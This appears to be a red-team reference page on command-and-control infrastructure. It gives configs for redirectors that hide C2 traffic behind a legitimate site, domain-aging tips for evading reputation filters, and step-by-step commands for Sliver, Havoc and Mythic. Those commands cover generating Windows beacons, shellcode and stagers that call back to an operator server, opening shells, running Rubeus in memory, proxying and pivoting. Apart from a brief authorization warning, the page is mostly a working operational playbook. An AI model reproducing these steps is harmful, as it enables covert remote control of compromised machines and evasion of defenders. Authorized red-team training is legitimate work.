Red Team

C2 Infrastructure & Frameworks

Command and control infrastructure is the backbone of red team operations. Proper setup ensures reliable communications while evading detection.

Warning

C2 infrastructure should only be used during authorized engagements with proper legal agreements.

C2 Infrastructure Architecture

Infrastructure Components

Domain Setup

bash 
# Domain categorization for C2
# Purchase aged domains categorized as:
# - Business, Healthcare, Technology
# Check categorization: sitereview.bluecoat.com

# Domain fronting (where available)
# Use CDN providers that share domains
# Azure CDN, Cloudflare (limited), Fastly

# ExpiredDomains.net for aged domains
# Look for:
# - Clean reputation
# - Existing backlinks
# - Relevant categorization

Redirectors

apache 
# Apache mod_rewrite redirector
# Only forward valid C2 traffic, send others to legitimate site

RewriteEngine On
RewriteCond %{'{'}HTTP_USER_AGENT{'}'} "Mozilla/5.0.*" [NC]
RewriteCond %{'{'}REQUEST_URI{'}'} ^/api/update.*
RewriteRule ^.*$ https://c2server.internal%{'{'}REQUEST_URI{'}'} [P]
RewriteRule ^.*$ https://legitimate-site.com [L,R=302]

# Nginx redirector
server {
    listen 443 ssl;
    server_name yourdomain.com;
    
    location /api/update {
        proxy_pass https://c2server.internal;
    }
    
    location / {
        return 302 https://legitimate-site.com;
    }
}

SSL Certificates

bash 
# Let's Encrypt (free, but logged)
certbot certonly --standalone -d yourdomain.com

# Or use cloud provider certificates
# AWS ACM, Azure App Service certificates

# Self-signed for internal
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

C2 Frameworks

Cobalt Strike

Industry standard commercial C2. Malleable C2 profiles, beacon payloads.

Commercial License Required

Sliver

Open-source C2 by BishopFox. Multi-platform, multiplayer, evasive.

Free / Open Source

Havoc

Modern C2 with demon agents. Sleep obfuscation, syscall evasion.

Free / Open Source

Mythic

Modular framework with multiple agents. Docker-based deployment.

Free / Open Source

Sliver C2

Server Setup

bash 
# Download and run Sliver server
curl https://sliver.sh/install | sudo bash
sliver-server

# Generate multiplayer config for operators
sliver > new-operator --name operator1 --lhost yourserver.com

# Import config on operator machine
sliver-client import operator1_config.cfg

Payload Generation

bash 
# Generate beacon (async, periodic check-in)
sliver > generate beacon --mtls yourserver.com:443 --os windows --arch amd64 --format exe --save beacon.exe

# Generate session (real-time, interactive)
sliver > generate --mtls yourserver.com:443 --os windows --arch amd64 --format exe --save session.exe

# Shellcode for custom loaders
sliver > generate beacon --mtls yourserver.com:443 --format shellcode --save beacon.bin

# Staged payload (smaller initial size)
sliver > generate stager --lhost yourserver.com --lport 443 --protocol tcp --save stager.exe

Listeners

bash 
# MTLS listener (encrypted)
sliver > mtls --lhost 0.0.0.0 --lport 443

# HTTPS listener
sliver > https --lhost 0.0.0.0 --lport 443 --domain yourdomain.com

# DNS listener (low and slow)
sliver > dns --domains yourdomain.com --lport 53

# WireGuard listener
sliver > wg --lport 53

Beacon Operations

bash 
# List sessions/beacons
sliver > sessions
sliver > beacons

# Interact with beacon
sliver > use [beacon-id]

# Get interactive shell
sliver (BEACON) > shell

# Execute .NET assembly in memory
sliver (BEACON) > execute-assembly /path/to/Rubeus.exe kerberoast

# PowerShell execution
sliver (BEACON) > powershell -c "Get-Process"

# Port forwarding
sliver (BEACON) > portfwd add -b 127.0.0.1:8080 -r 10.10.10.5:80

# SOCKS proxy
sliver (BEACON) > socks5 start

# Pivot to other hosts
sliver (BEACON) > pivots tcp --bind 0.0.0.0:8888

Havoc C2

bash 
# Start Havoc server
./havoc server --profile ./profiles/havoc.yaotl

# Connect with client
./havoc client

# Generate demon payload
# Payloads > Generate > Windows Shellcode/Exe

# Demon features:
# - Sleep obfuscation
# - Indirect syscalls
# - Stack spoofing
# - ETW/AMSI patching

Mythic C2

bash 
# Install Mythic
git clone https://github.com/its-a-feature/Mythic
cd Mythic
./mythic-cli install github https://github.com/MythicAgents/apollo.git

# Start Mythic
./mythic-cli start

# Access web UI: https://localhost:7443
# Default creds: mythic_admin / random_password

# Supported agents:
# - Apollo (C#)
# - Poseidon (Go)
# - Merlin (Go)
# - Apfell (JavaScript)

C2 Profiles

Tip

C2 profiles customize traffic patterns to blend with legitimate traffic and evade detection.
text 
# Cobalt Strike Malleable C2 Profile concepts
# Customize:
# - HTTP headers
# - URI paths
# - Request/response transforms
# - Sleep time and jitter
# - User-agent strings

# Key profile sections:
# http-get - Beacon check-in
# http-post - Data exfiltration
# http-stager - Staged payload delivery
# stage - Beacon configuration

# Example settings:
set sleeptime "60000";  # 60 seconds
set jitter "20";        # 20% randomization
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...";

Related Topics

Initial Access

Payload delivery techniques

Defense Evasion

EDR and AV bypass

OPSEC

Operational security